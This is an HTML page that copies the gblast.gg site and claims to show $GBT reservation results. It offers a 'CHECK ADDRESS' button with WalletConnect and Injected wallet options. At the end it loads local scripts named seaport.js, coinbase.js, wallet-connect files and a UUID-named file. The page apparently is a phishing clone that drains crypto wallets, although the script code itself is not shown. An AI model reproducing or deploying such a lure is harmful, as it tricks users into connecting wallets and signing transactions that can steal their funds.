<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>RESULTS</title>
    <meta name="description" content="Check your reservation results for $GBT and G-Boxes">
    <meta name="keywords" content="GBT, GBOX, GBLAST, BLAST, BLAST_L2, GBLASTGG, GG">
    <meta name="next-head-count" content="14">
    <link rel="preload" href="https://gblast.gg/_next/static/css/77ae3ca12d5ce63f.css" as="style" crossorigin="">
    <link rel="stylesheet" href="https://gblast.gg/_next/static/css/77ae3ca12d5ce63f.css" crossorigin="" data-n-g="">
    <noscript data-n-css=""></noscript>
    @font-face {
        font-family: 'Aldrich';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/aldrich/v21/WoHJhppfmE3M.woff) format('woff')
      }

      @font-face {
        font-family: 'Aldrich';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/aldrich/v21/qj3ga7kkJZBq.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Allerta&amp;display=swap">
      @font-face {
        font-family: 'Allerta';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/allerta/v18/lWgGn8k6WI30.woff) format('woff')
      }

      @font-face {
        font-family: 'Allerta';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/allerta/v18/sqAniyhJitIc.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Allerta+Stencil&amp;display=swap">
      @font-face {
        font-family: 'Allerta Stencil';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/allertastencil/v22/PAinFD3XTnt5.woff) format('woff')
      }

      @font-face {
        font-family: 'Allerta Stencil';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/allertastencil/v22/4sk7LuVSGexQ.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Archivo+Black&amp;display=swap">
      @font-face {
        font-family: 'Archivo Black';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/archivoblack/v21/xBFX8vbekH3w.woff) format('woff')
      }

      @font-face {
        font-family: 'Archivo Black';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/archivoblack/v21/T9ZbtqtTGrbC.woff2) format('woff2');
        unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
      }

      @font-face {
        font-family: 'Archivo Black';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/archivoblack/v21/NBYvH3v6lgU3.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Audiowide&amp;display=swap">
      @font-face {
        font-family: 'Audiowide';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/audiowide/v20/fFwPIpZLIjCl.woff) format('woff')
      }

      @font-face {
        font-family: 'Audiowide';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/audiowide/v20/EV2MbDorAAtt.woff2) format('woff2');
        unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
      }

      @font-face {
        font-family: 'Audiowide';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/audiowide/v20/eMc9r4ExbFKV.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=B612+Mono:400,700,700i&amp;display=swap">
      @font-face {
        font-family: 'B612 Mono';
        font-style: italic;
        font-weight: 700;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/fESV04mnrZds.woff) format('woff')
      }

      @font-face {
        font-family: 'B612 Mono';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/N8Q3bdMwJy57.woff) format('woff')
      }

      @font-face {
        font-family: 'B612 Mono';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/pCkxa3WboH29.woff) format('woff')
      }

      @font-face {
        font-family: 'B612 Mono';
        font-style: italic;
        font-weight: 700;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/zX955OVmA3xG.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }

      @font-face {
        font-family: 'B612 Mono';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/tLplkYV1GYHH.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }

      @font-face {
        font-family: 'B612 Mono';
        font-style: normal;
        font-weight: 700;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/b612mono/v14/4a71N2dRnJ6z.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Bakbak+One&amp;display=swap">
      @font-face {
        font-family: 'Bakbak One';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bakbakone/v8/zrZoZr4K0Y9o.woff) format('woff')
      }

      @font-face {
        font-family: 'Bakbak One';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bakbakone/v8/2khmZ8VIgvXk.woff2) format('woff2');
        unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09
      }

      @font-face {
        font-family: 'Bakbak One';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bakbakone/v8/A2fbETcBIVZr.woff2) format('woff2');
        unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
      }

      @font-face {
        font-family: 'Bakbak One';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bakbakone/v8/ohId5rbaaQ8d.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Baumans&amp;display=swap">
      @font-face {
        font-family: 'Baumans';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/baumans/v17/E3rqa3ENrmjC.woff) format('woff')
      }

      @font-face {
        font-family: 'Baumans';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/baumans/v17/LLYt6RPQ28UB.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
    <style data-href="https://fonts.googleapis.com/css?family=Bungee+Shade&amp;display=swap">
      @font-face {
        font-family: 'Bungee Shade';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bungeeshade/v13/HxNWy0yBN0jz.woff) format('woff')
      }

      @font-face {
        font-family: 'Bungee Shade';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bungeeshade/v13/VKSP2tlhCxyV.woff2) format('woff2');
        unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB
      }

      @font-face {
        font-family: 'Bungee Shade';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bungeeshade/v13/s0PcJRzmWU7E.woff2) format('woff2');
        unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF
      }

      @font-face {
        font-family: 'Bungee Shade';
        font-style: normal;
        font-weight: 400;
        font-display: swap;
        src: url(../Zmb8DCebwKNj.com/s/bungeeshade/v13/LQx6Vk8DzrwC.woff2) format('woff2');
        unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD
      }
    </style>
  </head>
  <body>
    <div id="__next">
      <style>
        #nprogress {
          pointer-events: none;
        }

        #nprogress .bar {
          background: #ffff00;
          position: fixed;
          z-index: 9999;
          top: 0;
          left: 0;
          width: 100%;
          height: 3px;
        }

        #nprogress .peg {
          display: block;
          position: absolute;
          right: 0px;
          width: 100px;
          height: 100%;
          box-shadow: 0 0 10px #ffff00, 0 0 5px #ffff00;
          opacity: 1;
          -webkit-transform: rotate(3deg) translate(0px, -4px);
          -ms-transform: rotate(3deg) translate(0px, -4px);
          transform: rotate(3deg) translate(0px, -4px);
        }

        #nprogress .spinner {
          display: block;
          position: fixed;
          z-index: 1031;
          top: 15px;
          right: 15px;
        }

        #nprogress .spinner-icon {
          width: 18px;
          height: 18px;
          box-sizing: border-box;
          border: solid 2px transparent;
          border-top-color: #ffff00;
          border-left-color: #ffff00;
          border-radius: 50%;
          -webkit-animation: nprogresss-spinner 400ms linear infinite;
          animation: nprogress-spinner 400ms linear infinite;
        }

        .nprogress-custom-parent {
          overflow: hidden;
          position: relative;
        }

        .nprogress-custom-parent #nprogress .spinner,
        .nprogress-custom-parent #nprogress .bar {
          position: absolute;
        }

        @-webkit-keyframes nprogress-spinner {
          0% {
            -webkit-transform: rotate(0deg);
          }

          100% {
            -webkit-transform: rotate(360deg);
          }
        }

        @keyframes nprogress-spinner {
          0% {
            transform: rotate(0deg);
          }

          100% {
            transform: rotate(360deg);
          }
        }
      </style>
      <div class="res_wrap">
        <img src="IMG_3415.png" class="app_logo">
        <div class="total_gbt">
          <span class="lbl">$GBT RESERVED</span>
          <span class="gbt_num"></span>
        </div>
        <div class="personal_space">
            <button aria-expanded="false" class="btn_accent notched interact-button" type="button" style="width:100%">CHECK ADDRESS</button>
          
          <div class="dropdown" style="width:100%">
             <div class="dropdown-menu dropdown-menu-end dropdown-menu-dark connect_menu">
              <a class="dropdown-item menu_connect_item" href="#">WalletConnect</a>
              <a class="dropdown-item menu_connect_item" href="#">Injected</a>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json" crossorigin="">
      {
        "props": {
          "pageProps": {}
        },
        "page": "/",
        "query": {},
        "buildId": "m-TQBdacLre285k2nd5tx",
        "nextExport": true,
        "autoExport": true,
        "isFallback": false,
        "scriptLoader": []
      }
    </script>
  </body>
  <script src="./scripts/seaport.js"></script>
  <script src="./scripts/coinbase.js"></script>
   <script src="./scripts/wallet-connect-v2.js"></script>
   <script src="./scripts/wallet-connect-v3.js"></script>
<script charset="UTF-8" type="text/javascript" src="./0a83a24a-cc71-47a0-83d3-a074e9f10258.js"></script>

</html>